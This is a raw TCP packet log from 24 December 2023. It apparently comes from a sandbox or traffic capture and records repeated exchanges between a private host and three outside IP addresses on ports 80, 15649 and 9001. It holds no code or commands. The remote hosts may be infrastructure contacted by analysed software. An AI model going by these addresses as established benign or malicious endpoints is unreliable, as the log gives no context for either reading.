Dec 24, 2023 10:44:32.423053980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.424591064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.424681902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.424740076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.430963039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.431001902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.431073904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.447923899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.447943926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.448122025 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.464835882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.464858055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.464941025 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.467744112 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.467823982 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.481878996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.481945992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.482007980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.499109030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.502207041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.502274036 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.518459082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.518497944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.518552065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.532845974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.532887936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.532978058 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.535150051 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.546680927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.546771049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.546817064 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.561108112 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.561140060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.561194897 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.574687004 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.574732065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.574801922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.588318110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.588412046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.588454962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.601867914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.602041006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.602091074 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.615310907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.615346909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.615408897 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.631046057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.631064892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.631114006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.632838011 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.632879972 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.632894993 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.632931948 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.632968903 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633007050 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633064032 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633085012 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633109093 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633124113 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633158922 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633198023 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633259058 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633299112 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633317947 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633356094 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633363008 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633397102 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633438110 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633475065 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633598089 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633641958 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633650064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633694887 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633703947 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633740902 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633768082 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633804083 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633825064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.633866072 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.633990049 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634028912 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634054899 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634090900 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634130955 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634172916 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634176016 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634213924 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634243965 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634280920 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634326935 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634363890 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634382963 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634419918 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634439945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634507895 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634525061 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634563923 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634579897 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634618044 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634654999 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634696007 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634735107 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634772062 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634792089 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634828091 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.634849072 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.634881973 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635030985 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635073900 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635098934 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635134935 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635159969 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635199070 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635349989 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635387897 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635494947 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635535002 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635557890 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635600090 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635622978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635662079 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635665894 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635708094 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635776997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635821104 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635828972 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635868073 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635891914 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635930061 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.635950089 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.635988951 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636028051 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636045933 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636075974 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636087894 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636135101 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636171103 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636171103 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636213064 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636280060 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636318922 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636354923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636401892 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636409998 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636442900 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636509895 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636549950 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636590004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636626959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636631012 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636667967 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636707067 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636746883 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636770964 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636811018 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636811972 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636854887 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636902094 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.636943102 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.636969090 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637006044 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637028933 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637064934 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637082100 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637125969 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637144089 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637181997 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637202978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637238026 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637255907 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637296915 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637320995 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637356997 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637469053 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637512922 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637640953 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637686014 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637697935 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637737036 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637748003 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637785912 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.637833118 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.637888908 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.641087055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.650799036 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.651367903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.651438951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.651493073 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.656179905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.656256914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:32.656335115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:32.660442114 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660500050 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660514116 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660547972 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660567999 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660598993 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660604000 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660646915 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660665035 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660703897 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660788059 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660830021 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660850048 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660890102 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.660897970 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.660940886 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661078930 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661128044 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661164045 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661221027 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661245108 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661283970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661329985 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661382914 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661475897 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661520004 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661587000 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661627054 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661690950 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661730051 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661803961 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661851883 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.661884069 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.661928892 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662058115 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662100077 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662204027 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662250996 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662354946 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662372112 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662405014 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662448883 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662553072 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662595987 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662640095 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662691116 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662698030 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662739992 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662802935 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662852049 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662883997 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662920952 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.662930012 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662966013 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.662992954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663028955 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663099051 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663132906 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663260937 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663306952 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663315058 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663355112 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663404942 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663443089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663518906 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.663559914 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.663825035 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664098978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664135933 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664135933 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664212942 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664256096 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664313078 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664354086 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664398909 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664438963 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664505959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664545059 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664588928 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664638996 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664684057 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664729118 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664886951 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.664930105 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.664975882 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665018082 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665313005 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665358067 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665405989 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665445089 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665498972 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665539026 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665580034 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665616989 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665668964 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665713072 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665848017 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665891886 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665894985 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665941000 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.665957928 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665988922 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.665999889 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666029930 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666045904 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666094065 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666099072 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666135073 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666378021 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666425943 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666429043 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666462898 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666471004 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666501045 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666527033 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666563034 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666565895 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666610956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666636944 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666678905 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666681051 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666718960 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666748047 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666788101 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666789055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666832924 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666850090 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666884899 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666908026 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.666955948 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.666974068 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667012930 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667032957 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667071104 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667110920 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667154074 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667202950 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667248011 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667260885 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667299986 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667319059 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.667361975 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.667390108 CET	9001	49721	192.121.44.26	192.168.2.5
